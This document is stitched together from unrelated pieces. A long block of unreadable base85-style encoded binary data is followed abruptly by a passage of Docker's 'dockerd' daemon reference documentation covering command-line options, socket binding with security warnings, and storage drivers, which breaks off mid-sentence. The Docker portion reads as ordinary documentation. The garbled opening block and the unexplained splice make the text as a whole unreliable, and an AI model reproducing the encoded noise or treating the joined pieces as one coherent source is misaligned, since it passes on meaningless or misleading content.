zFCvw98HCk1>@^~=O1gL9J{ecM`Q1SFzP3L9(n1)K*}L$~9`2d}K4bz~de4XcCXO6= z*;n1bS)Z(yS8((cpQ{=~k0X>!I_#J)juQyVEs|@_m$&c>6@&H^_NSYkF$O(?!iJ2!^$EcozOSdYzZ`RjV}aYL<0|)qt%GPsGrQ&ZY9N`LJkalQQ|wK4Cj>z zp3d3fl`nrF&R5 zwK!N7mZgMswILMKt=WNSG1yC{d;JOy2-lxMZI#bQRPR}J?#<>2d zqyIW)Wt4hZxv-LdaDAUkl z1)%837I|ZZmB5Pw9&CcpC_x? zh|}MnliAzM&(bf>U?$JVyi)k*7SV0a#$v;MgbbSHQPsI_zp&P>NDAATua?}z@ZAwa z0>s0H8m^MnwIU5ikD8wO?Cq8l8piLLclDWW3)}R1FY*fpzY58Rod1{OLR1$ zu_<^onUtldTv}dPWo?jBgd&?WQV39HSp~VMY7Xs0e^@*=J3lx)O1?VBCSOl+2AsPa zCGu8u&S4GhGLTYh7Ja_40w-F6JYs555P;tA8d5u66;zJP;O4Wz zJo_w{uM9~sBdZt+=KCRy{{OACm6Qz26-My^6BU?4^;Z-f3&@95rw^vf@d7Wi(I(w( zyQ@SvhzZ@R4fC|tGb=_^w8rvrEw|&S{n-vWD3%qWlKy_m3c(K{TfSmx_5z?{EpH?e zOFhz?z$*z5t7%l^dJcuPl1NmvOWXO{*0VC`v(T056Xd*tpp;J=}QAxzz)fqm~!=LY)ToA4PsQ(vpQMDGCUa?H|{)owzu2} zm62K->z|z5so>{KFtU1Jbeg1;8N`gMMT@Y|0YHW#g-S&`vk)m4Tr$522y!3EYUW_#9_btO9Az%ajVzg?o-q&7Usjx1Tu@cRibjrqB5%$^VNkS zd?FlhQmgW=5|rAE3$`Y2YX>E_l+IJw6X%elRkVi z?hTvwMzTlLNci>hZ6M!It)UNB--|>zre${?MnXw?;4Zq}0m^j6+=(W2LQb5cFxq(< zV73pY{|veFM58SjFRQneox-xjtE*Pi$stXb#!NNoq@ou$dXhabAucR(Pr8EjlC{-P zb@I=}E7kf@XYdjdlvXMrL3!4S^%tVyf#i)VcV!Ud3O|JO@R_$=?+#uhwDq zM4B0o*yiCaES$nM{RI}RA9$CXRpYMl3_B?#7Cv;0p47Xy5$}w|Os5m?(W6UZXRVWg z=w~;6EsGoY0$sY;4S79oNp?Lu%7z>_H|CqS!Rzd&;kNYhqf-n!$;!b*(co{`-NON@vYphk<{DQbk^A8rHTPNkJrLvRw zb|f@4zmPX5R(5JIU+>0rOnx%3%14!Uw#KxWy#6*@`2-7x?R7`?v~EOUgiU$2k%>YJ zD?2%{efu8qW-H3Y+_-f<$sXdBe^UFED_@n5m^$FtFkz0m5x_}>le6}bk%Q>SPAka+I4(6N(W8i*xW=+cH=4oY z*YQB^CH2&eD&P2X4C-Othe`$*=AU)DF`Z?^MXb>kjp-WdqAwGtTqGynC!r?RfdMqv zMLAUX$_42q0uN`^Z*ismXA;{d}GRnmyHwySgbHUeq}9U%!{OY4{qqz4^b4k{)Z)nBo( zBF;RD=+>2B8Ix3AIXw0f0!WepL|WtQQR)<09SAOW3MenhMQW0<*8x>4A>U& zwO7Ji7|mbUYs9bFYY!`c=J1y;HMqKBbkH4;mU`!ec~}ADVSh!T!7f5>FCjIZ2tgj3 z#X65pKKfH7Dn|6UCgBM21to!=@jBdUU(haz-6aaORDp1<4f?IvCEYZS5p`maj_cS$SC$F9+RS}pX2iJ(S`AbAN<`|hhCT* zv~t}TJd@}d5!Unm;u4waz)OO&GSH#>uMMZZqx*lKpT#?R( z1hvwEkbyi2VkjwB?6=cA&lNXsSbtc;ioD_NCi#^yc(R@s} z<1L6f#f4C2kT5qU9^+VS*wbx;dVYf)vGsF=Fqx^hV;Dx0*kBZ%2pPi0VUmPHfI@X^ zApK;^D}L#&t9Gn$ZjlyQGgSbg7?y~(b=s!{4{~cX2wk}?Pv!cF?bCS~&VOfN<%R@X z1J9^xPN&2Fp0Dsa;Anyo%zGFL16+CY<%$EvUrX-y&FhlDTeHWwe+9|{`WUi}Y)PLFHumC@s~Z%ITNeaq3Y1vFQe5;1H#mj-(mTI@uU z_dJvP_G&rbAv#T%V^ZK;S><&;TEd)9Y()y`+GX|$qUnor2c)Hd+Q&o`Tk`1%Pa@(* zJ1B@z;L=Es=0D+l%KNp+tTrePYhEI-v6kRWkG|_YhtT{rD4es=i(xE1 z&jFeSK0;D@TT_oFOroQW3k(>q!JzHMrqe|_Nc*0TxP_l&f@4}p(S^Wuv??mX^O z3EPQX{P6E5dE@V5ir~5D!aJYtX(Sa3{rUe@d63lKP07C-R(6k?7H)v!c_M+CNjS z9ZdBKPh}N~{z*%%daDX-q*m}KO#x{$foZm)33*pxyZ`6fdvVD;#V9?|9=4;y^whLV zvuPJ4(vuFQrxhVG)(}~9>6hnXI5Vt22Enpnfv{bOWL)O8xQND7aM2)KG%$(&E3i@` zbKN$Ro08d3loeZ>89SA!O$@gNvK|+})h7aHJF>>cGL?Z-d^LMW%o9!&$A)k48`7nQ z8F)$}kXD4~>^Kz;8zL#0fvKSUlataCS;02hNZ;&DTj2hj+6$C*{7!j7(qa zbmb|g^Tpetz3c_&Pn^}s6@3Sa6V8Y-a%CJ`=MEh69+NE@hTN61=lzZwFd{OhXn3?ONV{;+K-;FwU-x5X`g|WPDrmGKPqmJzoJ(l z>Rx~sgAWl3ye0GA98e1Mvf#)Zx(l?2hx|O+eUY|D+m0hNd9O-+xf(uyly~at=YYc3 zqTYB$;rt97=5Q3-qDtd+yZ2q@L`>1;`-P2FMSre{Uiw{dS+v+F2*`J^wPQj?4Z0go z5BDD^8T8*Np3^C*yYFLrwWOr0ME|u%s3;_p7|!uF7GL+ck%8|h*6x(dEo?9CD~2#} z#cHjGuDuIMAIpn~6}w^;B*hNs2PvMJ;8O$^)&xjWmr$Fzfw9Ln#o%h$C@OJ44g zhbjzm5o!_A-h~L~8DKV`q8+FNaFvJbDmTI_jeHSzu+V+pD2+N%|Mbe6I0oLGVG+wX z=qIa|=UVYg1kJ8M1)K1+c z!@A$bc)GF%5L{74O}=oi?skj$yKh30;irNgs7fwDp>2C5GUc>etX!!+wQO%r2g^K9O$Yrpy9Z`Yc~%5O0m+QI_C%+s^-;;q`!37LLP8@jzSw(cuArt-i_3XLjq z8l`2x8Qq%EvD_@@m3KyctKb#SC~G>OMQd$cn7F-(Oly*Gj+R!3i2~sXtPDtGF@=gx zddvr-Vy#W?I|6#kDYy5ZX1F0=WH#~nUiBT7nnCe#szIXP9+BTPhBkJbRNsne4kODL zf)q<3PkEFvMZlbLFc(l-$H?v{<*c_E=3o@>VMU{AFhkM2h9FuXGxfJ4egvz=wGYX| zhrLEob)ZVC+2?u6X+Px4{1k^y? zc9L5=Zn!OvVR4!dKt%2fR_yo;GS;ZPLkjI4+k)rL;!m2!MH%rO59d|Bhjb;0mu;Av zlg+oNHK~{!&ky|l-_7emB{eafR4r=qhA>H6M45yb(cU@Lm@jmo3Q58lNwXsq^E;hY z&P93R2mQJpN9bphPzt`tyIFUqG2T9d`>%U@VM&;R6~R#OZZalk>=d@ZhA5R=dYg|= zy-R9Q+h*JN=ywyDPhV8N`656r^E*pI&b3HSjxyl|E(;_3&qnFxl)Rju^k*xWb6ndz zlOD(=u~_2xZ4|1wYQ9w1i7D5)-D@eV#pi_Vn?UmX(cw8KG_(&nnV58)Hqg*=tSDT( zM0?lcX{NJ??{DvbJd)(qTw%l?R83s*K56U2nWCdi`AZyOA5*P}BIdfO*cs3+wKi<~ z-G-89G*TrfCnTRr#x6A~9FeZmAIy||K4d(&Bg6YpH?~v0_mryGLtKj0sAvdE&rR8} zR}N)K6r7edT@YE;9!sO(4u%Mm|Dd#q=+k&r=OqojFEGnjM*oYEM|JQQ%P`KI|A+jp z8^MEuK1j1LLl)i0*#k+HSBV-NOKT%UyWw4W_i5)=MXKFwWY)tTgSUNwB%kpt`gj(T zbEZ5HajH}HCA7LpxK=9_2`SQ?#v$CUkaNnX6NMTd;}sO^8oc}!}|JHVW%*? z6uMr~4b-0}*eCp45L?oj4ZgwK7VZ-?LEO@OIOcXmV3j;&Gzi1w`k7)D-(Hkqg7%dI zDp_Gu*KUkvQKfXxYp?r0$-*EChsJh4ao7|2gqwv8G1ECcIIYo#a%BJ(hlF30$%{c; zvUITuE3C6+n1(N62HPd_TKT2lm=o4Xk=-jwlg<;?yUHA^wlbMHJQnjr;7B81jCzd&5s+Ztufthp;YM#* ziSStyi6}0bFlgR#kRZGRiym*EEVUA`vg#RzP7F?W<{s*2Srjg-ZZSy8gCrej?$-wV zqP@ZT(0rkKZt^bv>(1>5gw0>;c6%Hi6|yG1|2eey1m;*|-?=y3zw{#Z#@>amCkBu3 z*-?O#0mAtsNOLhnYw5_@8M{=fs8_45^~Nb?uBj-XV){g*;e>!4tLUn&c*u%v?#8v4 zryXJs?GuwLxLFIj;SQXRgI1%(H|K@V?R_=ti!|FPf5OM*5nv;+e^AZZzAQmVo6J@O zZLF<{xwZBH=~a2~av{rlTk;7eBnT6VybI6tczEB^Q|w(48pzw9$IW+Vc%OKo)9LV< zCmuJm=&!dDY)QnOvcPxg&8&=%ECY&v> zzG*9BL3AiMwAh)wMgZQ~jlmq$wP^~rGfhi3iIS|)RwKWg;eDUg3f2fj)%_D|_=NiR z+tUOUbi7^S&&jn8tq;oN4;N!TY)j7HzeA%l)h2v7^T`KF|3b*Rnl&8T@8g;mmXY3Yryg#Ma+nl@cK0YqsjITP!52 zP1$o?PnhpE3zp8odo48C?^yXM#y zHf?LUW2=4a(%TNxTa{4jWz{=!TX!#qxUC|3&P3%uM(lcfifOQ&j*HkGxXl+EVf27c zly$n9J5)pbcdzEL`GLO!9pIvC*j=NDB z>iQ!4KQ&~@%WvNozWczbA!B~r{8pF$eTUOS*8FvQ^Y1?hB@=X+LZosFtNw{Su7j3R4(nTairqR=l3arvA1e_FCYp(^c1$RhuisI9mww7+%p!5=OC|+5#AH| zx(B&#{Kl?MGPKVdn3~)<`MAtgS@mYOzWlRezCE6Q71KV-VC5GkHv>A_X8M!TzJLr) z4ViiJp1hmAx2do1ap@gHpX>g<56_Sm+zH=>!a{705(ZNNM;;=>n_CYH%DZ>wgl&p9iqEXi}r1QO4S1|1wsmXXgJ z3Mb42CdC*;1WMZw)y9Uj^$k0+Hmq9zH!+fH(V%}PYYy2r34mVywDx3oz{(Kb) z*eeGdcAg7^xY5@CrL;Zyrr?mH@zJY3G4GD&OO#Qpk`Er|0b=)MiY8y;RNxFEl|~3} z%c7p0d|MtjMxY_%f4qBJsg%tG5u>Lu@PQ9qg-V_d93~CcRa+XV&G!ucj~$`$U42>1 zd&0GS4*?L6Q1pEw?5q_I?_f!H-X{r~ZP16~j7PSDn@E^&SlGF@v%y6V*}@d46g#!v zIUF7A%!HJEjogP&Y|J@)prxk@5MV-fY=BG{7!$7BcH3T5=%|%~2nyv6u*~ z6SH(e*aR$rCf5oj4IhyKv2k=7+B~R_ zgN@J8X*)dFg@ZDXbS-^2)4S9P0qCTi{dL^Jp7pVn`hJoJW z;JOh;+eX)7Onwc9FsZ)*>s^SbRg_#Z!xFi%_~(S1v=ICVz>`IGqNd~};vOK6_RI){ zl4*{TzTCKE(vng;$7)JRE`+L3fz%-fUJ}>J?HO)U`|Co@0P^P+i1MT)@3;&C0AH;Q z#*)L$bg~nijcI&8tf-iVGqmhxyzqYp_B96Unf)tW%-V9KK`RCFc@rmADcOJspvuBQr|M2M~bM6z|#u zrS$?pbr%DH?vWXYJ0MFTnQEp?toF(YgEo_i#ko#g+CPj&Kb0iAMotlFHA2wHtH%G6FAvm=Yp#oJrik0S)t}|2hUX5s4P6oi_ za4r=lzE1DK)BzKYV4+AJMZZVDT2sUvTK02QNEG1$f)F|#s-)_K(-YF5YX2Gv<{;nO-4Sic?+zN-B@dt{@$a>jMG( z?~=J{pYryGEE(BkO!Tm<+?iBpEbG=T)*MI){=+H6} zg`-;N`y(I~prqjC$nm`eWaVu2)WnbLwW^1c95Q~C8kruiKMH`3B<9^1vun{GjjyMf zfV@07fIpZu_Cytd#aA>UkwF%!rzajCbqnhd23zKxBoB&m z9c~G>jl%6ZMY~tpxD%=_XtG2Xz}>NF-kn~+I^x&|^tsq`c-~VkQO%MM3LB3*d=K$d z{v`=SehRf2odANTjYOCCd{rsoIQx#=m^QPw7Lf9=5K|oD(ZIbI4k5mG3p|X;@A!r< zVV|_rs+tkd9l`n$5ejuBhADB;*Let;5b4>&Tw-MX7_XnQ3=tU7p~ZzY(9AmSPP$Ov zki-E1vqs?(Z^?)4PXz(M^tgP{a_g18b-FAt-mV7lhi!n8PMOc2js2*7_-=hS5_o=8 zKuh&k3`$-Fhja}~gtGHtc>FOp_pk4?2Tq*0IOQplK@zUeOUIIwEB|qKGKC50=#?~# zEE$X6DZxPeoocT^IiqnKm&`k$wD3^Bh(NCqAW=4rOjf0Gs{n~+(>}05k#?{q`H+PD z1Ei3O06g-+1rSMaQ$-R>J+%NV8}l~hW&C61?@5BVXKq?WFHf2lf3wRF=i&XuM0HGF z*R1rjmf=Z((s@(3Ly#y5qOiz@XS%YH<8-NMau>HR;1|l|>CdEEyfsJmh;zv5U!Az3 zmc)!rj=cd#6cnwb^M&$4w_OflDY-nY$I93tD^hPgZ0H|5_0G z{hz&8i39S*qgx=7TKJO-yr5F_N>l>Jo^Y3AZasPUu~v(D$xgfTO`ar54FGn3fgji) zjWGyyC{Az4JV{SeXC(R(~Vhs_%tDqDtW0!St&KNyqGKd|AOADz}%Er??K3UYs3idT{1GdmRe9!(vY6cTrF%NB(q zdes1OfAO6Acw&Q?9+qe(i@{r}AaknqbA}MxBqZOmrUK6n5MY^>6qd##1mE;bN#4M7 zWAITDc+S@Yq^14&NqU@720+eephHitr8c~!oi55u_?BA3se`gdnJ$BSZ_B+OhVb-V z+!RHPu;7d7vA67H`VoKw64$f5;;S5C_Z^oHPf6Ug_EYA=jbq_jf^I*z}>#m3PO;vmK<3JsonZ{%tI_Tr}R$ow`!LSYc7VyHl~7NpV0)I1&}aZ0w% z5c%_K+^ry_Z#?obG6g0oiIOu_ypp01W~N}^Xa|&~al!%K!h^*Hsm26v0?LjEe0hs> zWrNZbV;()E8nciVc2!V0!vXKD5a)gue0`wPp#Q7=>8hA&z9p%b%m{4e4Q@C7H z3DqjRV_e_BKP#5J1OW@bt1~e*Wz&HrZ9wl`g8MVV=^u{#2?W!Yn##7iQJdQ9L>SA` z)NmAc($d6IDxDILxD12|B}io>O5Vn8fF~f_hF}jMRJ0H$3a*_E_B_yNMO<}J*7wy1 zb^>%A3043?fgEV6B`aY=Frn0Byt#HR_z3;ErIjO}F-1#}Tor}CpzL13*&zsG$}n$i zq!^&Q7QkrN40+@EUjG2da#3YKn06qq8eFS|yQL28{tm)KJL{j$;kyrbJayrsduv#8 za>Nc?bUPxahpGjk^PM9?fhDzoTW_0sGF_e=zNu4irh|geiHJ*BLKsv7^#>a>$>3-z z;j#|FNI`e)wqwijqaR0r6Hg)dFub;M>k8CzO$07-b`OPUQ)@vc!5_bRVQV`Iapr?> zJANH-jlUBRwT}=p;rQBwU_?1s`@P$SyEEUi$JMj5_)Citk@1PET|AZ0w(WeS=h!iMD$Mby%7)2t6CnZK?p)5H8&5dXb3DFwC-7YA?WQJp&l^V!(`I>(-5u{c z7gKwR@)`!B4);ws@H!H7DDaz!&ePrmC0zVHhPC9h{nMIC>D;||h5>_@IkU}a1O!Ut z56dv40cw*j`?N%=!`(aG*@p?cF;?nC2g%+ekRy0vq!VuzTJ90*0zf&d9FiZ{#l4Rc zr8XsU9tU_I%hpN@R(huNEEtNP8FXnGY>ytkd5{3N)Q)e!=5%Pl3b-*KxpvLj6^E%;xUG=2X)_@@ew!RB2iA1{}jMi!I7Qr0|PO;OaM7ykxg_$7`0HAvo8DLn4aqQ1?__Hx zylC6PsT*_h4`N3^_hH!;zu3(*4P}N#y~8OzBBIvzvH|Of9tMH;S68O0OH)CeBRbE0 zftY(N)H@BlI={j+lYmY-I@63A)U(r4*Q3nX-&FU_05o}JUx#Zs=*Y4+^NLcv)^Na64ihOvvsJXPbQO>u#>($)eSKpjp{y6`t zr~K8H`uv}luVVhb0%WHlbM`YIHh0A+hoGJ5Ve>b42>fGzl3Eh#uNOJGq?xcJQBf+@ zzjR=JN%qqvoa}P2(X!%&1f>hh%&W_)&HieO%TwQ%wVFM2%wJD=yf)As1fPF0YW6v=01Z%R#$F%HI4emuKNw zNBbAY&G!0FvQ7PDs^V9-oE1mG>5vPH{?F&aE7)9LGNJ|8g4OBqvJRZ|QQX(vH1nOc z9T*-_=)I7mb~Qw>!cD(VPkvgL!~uThAEmVm=Ffec6aba(f7Ic`*10}S=D^O@pS1Dj z|FS=I9^Gd%`AHTFz7pV=Dzd+62=P^){WbaC|H<0+CyXMcbDV}yVShgN6w+j#)x||M zH(4%tS}I#xDln~ju35@^5RkXdnj~))=^*w{Esb!Ssgb}-qYddqV77Ee&7Kj;v8Zgq z`{jtB`-6Rk!7gLDLw*4P0r@dMtICcB$ec%g)j3As4Dc`JALAv~m>iQK{LxpU7pvaF z3RagrfI#gDx6(@#nMLN6~XAFw?bM2Eg)LI>B#CvQ5F@c zXXP~!1@+>^`jq1OlY&z^#Z$uEwzlu1liC8lr!1ny(xO@w7wKl?)vut|m${^PH7WS_0u z3J5|@gM@{KhlKz

hX^kC2g)la!T~mzbHFo1C4VpP-?lqok##r91$LtE>yEgg*cx zMgR*+PD2C&MuQqiPD=nShd>7aD1*Vsg*wIn8iytT1h=k*u_A;k001zAAKin}BZkGt zgDWP3v=prFhl;22^Yr!h_xSnx`~01$?*N@Zcr_>%iW>mb4VsbA$%-4vgsm!&AmTDZ zMqJ@I)B->afdrix95jT%3jz(DSR-T%5ye3TE{K?UfI&cj@%ri9|H-qb&!0epq6&HQ zkcN;rJnoRV4nT&IHKNJ@@Sz4TLm~oLTqPuBAtdLH7E1cjNr8_@7y$Soa6ln&g0N~; z0svysn>mH*-OIPH-@kwx{kw|@1%M%h7!INJA<>5&1tLcVAfUiTLoF6;ojB~!0EmVW zFFfpI>5`@;oPYpu)rsNOgfas=M;Pa#z_@ek-p#xBqrtTc(egHEgk~oc4iFj=&Jfc> z5ELp~r6hppLOTZB8cxXgppLB>K;Qxb8S*FJZTaP>V#bSO{&-ylr=AOHXm zlyK1x7XVNI45z&yfB+w$P+%_r3?RY?0TL4AkVWEXx6hEPhglJThMEbX zo0e+osi?*`pQx<1>MEe5rYh^Kw4S=^tGMQ>>u#~u>g%t-x^wHU#1?C8PrU}K?6S2E zd+f8&Mr%s4%vNhHpUz6F?Y7)jLhZHSh8s|}-Ii;v|F++XtM0mlkbCaC@amc_yYzzV zZoK&B`{}&y2%*Ad4%OHputTWuB`ZtZkeYx71Ej+U09$*nz7$uiBfqOG*qlnoIS9e8 zMu@QSDlm@bbcJ*wZq^2wZB3VLc3{-vpo0@Lpg`#kD4>v( z)J8~M(lslfz+ypp1AM~@-Yn6=3S9q?H;cn50fXCxDDi>`HDvws434YNS`AWry&Mc9 zaG1d}FI=Sq&WSpK#Nsm`w!@Y$*tN>bXU8u4|2@4bag+uch%f*(;(V}#5d)?CLI4Ol zp@Is8n4pf(g30t8rq zTM-i1rV~aKFw7D#08qjXw|p=I5E&SNAe69x(`djvKybhSWF#!5&F+B^yoV0}P&!0F zX%Gm3NK#JYg#1Yj0>xv1Xll?NCuG1TFc1I-nF9?ImT&g9Xz9gQ+!8Pj-bU#S~3(sV}%WCI1DZ=CzD4+(2&}NCnh~{5FA*G3kl&y z`INGTd4#1ySaTlqxo!ji*juJHh652q4w2!Yi|Y!3O950UlI~#0C6~#}OhkZ<7W5%4 zh5>*Nm2nVf90UaR2E;??q7b23AOg({s6Zj%0{Fd7ni5F>01S1_P&z>g#dCr}uVbDnmFWWT(||!+Inl(( zQkFH4P%msr2nw81p5Z700O+J4|6mfwWbQFSg&@$Ley(BwE*Pjz1=@s_t|Ay5_!;sT zl7T@OMg)n2{Kp^_*qCv4B zjuHmIA`rCD3FOIRS0J#29e{5MOQ1_*fB+*I(Z~rUxQuL^AhID0A)bXWUlVr9SZ0!d ziiB8#$Ov!)BUEVtY*9e~fVcuNu_&7qAYUO;NEw!vrT`?jS!d`LYW%JimFlPG>BaXVe$)KLwM12 z`NiuhN+19xnD@Y0qyYd9#wQAZpk5Fr%u;B8;0i}@0|T%WVM@@T1aK(AAZEo72CxAO zn|O9lXg~opTomSV;FTecF-Z#0fG3>z#%F6n0|>xi8T*(|c5T37aZKc`LU9N zV;BtBxX4gunhON*+9g{#AT=OsPNU4_r6pkl=QDw5uS{mRn!o@6*gz7x%;u#X;RI-& zh5-&h=Q`W@&UntVp7+e>KKuF4fDW{s4S*5=7~lkyY_p=hoP!v+fCZ3_w4^6Z=}KGr z(wNS)rZ>&$PD|PaCNaptnioy#Qk(kJs7|%2SIz2HyZY6zj + +# daemon + +```markdown +Usage: dockerd [OPTIONS] + +A self-sufficient runtime for containers. + +Options: + --add-runtime value Register an additional OCI compatible runtime (default []) + --api-cors-header string Set CORS headers in the Engine API + --authorization-plugin value Authorization plugins to load (default []) + --bip string Specify network bridge IP + -b, --bridge string Attach containers to a network bridge + --cgroup-parent string Set parent cgroup for all containers + --cluster-advertise string Address or interface name to advertise + --cluster-store string URL of the distributed storage backend + --cluster-store-opt value Set cluster store options (default map[]) + --config-file string Daemon configuration file (default "/etc/docker/daemon.json") + --containerd string Path to containerd socket + -D, --debug Enable debug mode + --default-gateway value Container default gateway IPv4 address + --default-gateway-v6 value Container default gateway IPv6 address + --default-runtime string Default OCI runtime for containers (default "runc") + --default-ulimit value Default ulimits for containers (default []) + --disable-legacy-registry Disable contacting legacy registries + --dns value DNS server to use (default []) + --dns-opt value DNS options to use (default []) + --dns-search value DNS search domains to use (default []) + --exec-opt value Runtime execution options (default []) + --exec-root string Root directory for execution state files (default "/var/run/docker") + --experimental Enable experimental features + --fixed-cidr string IPv4 subnet for fixed IPs + --fixed-cidr-v6 string IPv6 subnet for fixed IPs + -g, --graph string Root of the Docker runtime (default "/var/lib/docker") + -G, --group string Group for the unix socket (default "docker") + --help Print usage + -H, --host value Daemon socket(s) to connect to (default []) + --icc Enable inter-container communication (default true) + --init Run an init in the container to forward signals and reap processes + --init-path string Path to the docker-init binary + --insecure-registry value Enable insecure registry communication (default []) + --ip value Default IP when binding container ports (default 0.0.0.0) + --ip-forward Enable net.ipv4.ip_forward (default true) + --ip-masq Enable IP masquerading (default true) + --iptables Enable addition of iptables rules (default true) + --ipv6 Enable IPv6 networking + --label value Set key=value labels to the daemon (default []) + --live-restore Enable live restore of docker when containers are still running (Linux only) + --log-driver string Default driver for container logs (default "json-file") + -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") + --log-opt value Default log driver options for containers (default map[]) + --max-concurrent-downloads int Set the max concurrent downloads for each pull (default 3) + --max-concurrent-uploads int Set the max concurrent uploads for each push (default 5) + --metrics-addr string Set address and port to serve the metrics api (default "") + --mtu int Set the containers network MTU + --oom-score-adjust int Set the oom_score_adj for the daemon (default -500) + -p, --pidfile string Path to use for daemon PID file (default "/var/run/docker.pid") + --raw-logs Full timestamps without ANSI coloring + --registry-mirror value Preferred Docker registry mirror (default []) + --seccomp-profile value Path to seccomp profile + --selinux-enabled Enable selinux support + --shutdown-timeout=15 Set the shutdown timeout value in seconds + -s, --storage-driver string Storage driver to use + --storage-opt value Storage driver options (default []) + --swarm-default-advertise-addr string Set default address or interface for swarm advertised address + --tls Use TLS; implied by --tlsverify + --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") + --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") + --tlskey string Path to TLS key file (default "/root/.docker/key.pem") + --tlsverify Use TLS and verify the remote + --userland-proxy Use userland proxy for loopback traffic (default true) + --userland-proxy-path string Path to the userland proxy binary + --userns-remap string User/Group setting for user namespaces + -v, --version Print version information and quit +``` + +Options with [] may be specified multiple times. + +dockerd is the persistent process that manages containers. Docker +uses different binaries for the daemon and client. To run the daemon you +type `dockerd`. + +To run the daemon with debug output, use `dockerd -D`. + +## Daemon socket option + +The Docker daemon can listen for [Docker Engine API](../api/) +requests via three different types of Socket: `unix`, `tcp`, and `fd`. + +By default, a `unix` domain socket (or IPC socket) is created at +`/var/run/docker.sock`, requiring either `root` permission, or `docker` group +membership. + +If you need to access the Docker daemon remotely, you need to enable the `tcp` +Socket. Beware that the default setup provides un-encrypted and +un-authenticated direct access to the Docker daemon - and should be secured +either using the [built in HTTPS encrypted socket](https://docs.docker.com/engine/security/https/), or by +putting a secure web proxy in front of it. You can listen on port `2375` on all +network interfaces with `-H tcp://0.0.0.0:2375`, or on a particular network +interface using its IP address: `-H tcp://192.168.59.103:2375`. It is +conventional to use port `2375` for un-encrypted, and port `2376` for encrypted +communication with the daemon. + +> **Note:** +> If you're using an HTTPS encrypted socket, keep in mind that only +> TLS1.0 and greater are supported. Protocols SSLv3 and under are not +> supported anymore for security reasons. + +On Systemd based systems, you can communicate with the daemon via +[Systemd socket activation](http://0pointer.de/blog/projects/socket-activation.html), +use `dockerd -H fd://`. Using `fd://` will work perfectly for most setups but +you can also specify individual sockets: `dockerd -H fd://3`. If the +specified socket activated files aren't found, then Docker will exit. You can +find examples of using Systemd socket activation with Docker and Systemd in the +[Docker source tree](https://github.com/docker/docker/tree/master/contrib/init/systemd/). + +You can configure the Docker daemon to listen to multiple sockets at the same +time using multiple `-H` options: + +```bash +# listen using the default unix socket, and on 2 specific IP addresses on this host. +$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://192.168.59.106 -H tcp://10.10.10.2 +``` + +The Docker client will honor the `DOCKER_HOST` environment variable to set the +`-H` flag for the client. + +```bash +$ docker -H tcp://0.0.0.0:2375 ps +# or +$ export DOCKER_HOST="tcp://0.0.0.0:2375" +$ docker ps +# both are equal +``` + +Setting the `DOCKER_TLS_VERIFY` environment variable to any value other than +the empty string is equivalent to setting the `--tlsverify` flag. The following +are equivalent: + +```bash +$ docker --tlsverify ps +# or +$ export DOCKER_TLS_VERIFY=1 +$ docker ps +``` + +The Docker client will honor the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` +environment variables (or the lowercase versions thereof). `HTTPS_PROXY` takes +precedence over `HTTP_PROXY`. + +### Bind Docker to another host/port or a Unix socket + +> **Warning**: +> Changing the default `docker` daemon binding to a +> TCP port or Unix *docker* user group will increase your security risks +> by allowing non-root users to gain *root* access on the host. Make sure +> you control access to `docker`. If you are binding +> to a TCP port, anyone with access to that port has full Docker access; +> so it is not advisable on an open network. + +With `-H` it is possible to make the Docker daemon to listen on a +specific IP and port. By default, it will listen on +`unix:///var/run/docker.sock` to allow only local connections by the +*root* user. You *could* set it to `0.0.0.0:2375` or a specific host IP +to give access to everybody, but that is **not recommended** because +then it is trivial for someone to gain root access to the host where the +daemon is running. + +Similarly, the Docker client can use `-H` to connect to a custom port. +The Docker client will default to connecting to `unix:///var/run/docker.sock` +on Linux, and `tcp://127.0.0.1:2376` on Windows. + +`-H` accepts host and port assignment in the following format: + + tcp://[host]:[port][path] or unix://path + +For example: + +- `tcp://` -> TCP connection to `127.0.0.1` on either port `2376` when TLS encryption + is on, or port `2375` when communication is in plain text. +- `tcp://host:2375` -> TCP connection on + host:2375 +- `tcp://host:2375/path` -> TCP connection on + host:2375 and prepend path to all requests +- `unix://path/to/socket` -> Unix socket located + at `path/to/socket` + +`-H`, when empty, will default to the same value as +when no `-H` was passed in. + +`-H` also accepts short form for TCP bindings: `host:` or `host:port` or `:port` + +Run Docker in daemon mode: + +```bash +$ sudo /dockerd -H 0.0.0.0:5555 & +``` + +Download an `ubuntu` image: + +```bash +$ docker -H :5555 pull ubuntu +``` + +You can use multiple `-H`, for example, if you want to listen on both +TCP and a Unix socket + +```bash +# Run docker in daemon mode +$ sudo /dockerd -H tcp://127.0.0.1:2375 -H unix:///var/run/docker.sock & +# Download an ubuntu image, use default Unix socket +$ docker pull ubuntu +# OR use the TCP port +$ docker -H tcp://127.0.0.1:2375 pull ubuntu +``` + +### Daemon storage-driver option + +The Docker daemon has support for several different image layer storage +drivers: `aufs`, `devicemapper`, `btrfs`, `zfs`, `overlay` and `overlay2`. + +The `aufs` driver is the oldest, but is based on a Linux kernel patch-set that +is unlikely to be merged into the main kernel. These are also known to cause +some serious kernel crashes. However, `aufs` allows containers to share +executable and shared library memory, so is a useful choice when running +thousands of containers with the same program or libraries. + +The `devicemapper` driver uses thin provisioning and Copy on Write (CoW) +snapshots. For each devicemapper graph location – typically +`/var/lib/docker/devicemapper` – a thin pool is created based on two block +devices, one for data and one for metadata. By default, these block devices +are created automatically by using loopback mounts of automatically created +sparse files. Refer to [Storage driver options](#storage-driver-options) below +for a way how to customize this setup. +[~jpetazzo/Resizing Docker containers with the Device Mapper plugin](http://jpetazzo.github.io/2014/01/29/docker-device-mapper-resize/) +article explains how to tune your existing setup without the use of options. + +The `btrfs` driver is very fast for `docker build` - but like `devicemapper` +does not share executable memory between devices. Use +`dockerd -s btrfs -g /mnt/btrfs_partition`. + +The `zfs` driver is probably not as fast as `btrfs` but has a longer track record +on stability. Thanks to `Single Copy ARC` shared blocks between clones will be +cached only once. Use `dockerd -s zfs`. To select a different zfs filesystem +set `zfs.fsname` option as described in [Storage driver options](#storage-driver-options). + +The `overlay` is a very fast union filesystem. It is now merged in the main +Linux kernel as of [3.18.0](https://lkml.org/lkml/2014/10/26/137). `overlay` +also supports page cache sharing, this means multiple containers accessing +the same file can share a single page cache entry (or entries), it makes +`overlay` as efficient with memory as `aufs` driver. Call +`dockerd -s overlay` to use it. + +> **Note:** +> As promising as `overlay` is, the feature is still quite young and should not +> be used in production. Most notably, using `overlay` can cause excessive +> inode 